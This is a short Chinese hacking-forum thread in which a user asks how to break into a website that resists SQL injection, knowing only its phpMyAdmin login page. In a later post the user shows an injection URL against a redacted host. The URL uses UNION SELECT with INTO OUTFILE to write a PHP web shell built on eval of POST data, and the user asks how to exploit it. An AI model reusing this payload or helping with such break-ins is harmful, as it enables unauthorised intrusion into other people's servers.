查看: 2678|回复: 4

sql不能注入的网站如何破解

[复制链接]
  • TA的每日心情
    慵懒
    2016-2-3 14:47
  • 签到天数: 7 天

    [LV.3]偶尔看看II

    发表于 2015-12-29 12:32:25 | 显示全部楼层 |阅读模式

    sql不能注入的网站如何破解??
    目前只知道 myphpadmin 登录地址  其他一无所知?
    啊D工具 不支持sql注入?
    需要用到那些工具? 什么操作
    大神回复支持下呗 谢谢了
    回复

    使用道具 举报

  • TA的每日心情

    2024-11-13 20:06
  • 签到天数: 1628 天

    [LV.Master]伴坛终老

    发表于 2015-12-29 13:21:13 | 显示全部楼层
    干嘛非要找注入呢?
    去技术文章板块多看看

    点评

    没有找注入哦, 只是不知道如何攻破 , 同服务器下就一个 网址 也不能旁注  详情 回复 发表于 2015-12-29 14:21
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    慵懒
    2016-2-3 14:47
  • 签到天数: 7 天

    [LV.3]偶尔看看II

     楼主| 发表于 2015-12-29 14:21:04 | 显示全部楼层
    90_ 发表于 2015-12-29 13:21
    干嘛非要找注入呢?
    去技术文章板块多看看

    没有找注入哦,  只是不知道如何攻破  ,  同服务器下就一个 网址 也不能旁注
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    慵懒
    2016-2-3 14:47
  • 签到天数: 7 天

    [LV.3]偶尔看看II

     楼主| 发表于 2015-12-29 15:55:26 | 显示全部楼层
    https://XXX/index.php?mod=account&code=Sendcheckmail&uname=aaa%2527%20union%20select%201,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,%2527%3C?php%20eval%28$_POST[%22c%22]%29;?%3E%2527%20into%20outfile%20%2527E:\web\1.php%2527%23   
    这样的漏洞如何利用呢

    点评

    90_
    写入文件需要相关权限  详情 回复 发表于 2015-12-29 16:31
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2024-11-13 20:06
  • 签到天数: 1628 天

    [LV.Master]伴坛终老

    发表于 2015-12-29 16:31:32 | 显示全部楼层
    john_chu 发表于 2015-12-29 15:55
    https://XXX/index.php?mod=account&code=Sendcheckmail&uname=aaa%2527%20union%20select%201,2,3,4,5,6,7 ...

    写入文件需要相关权限
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-11-25 03:54 , Processed in 0.021319 second(s), 12 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部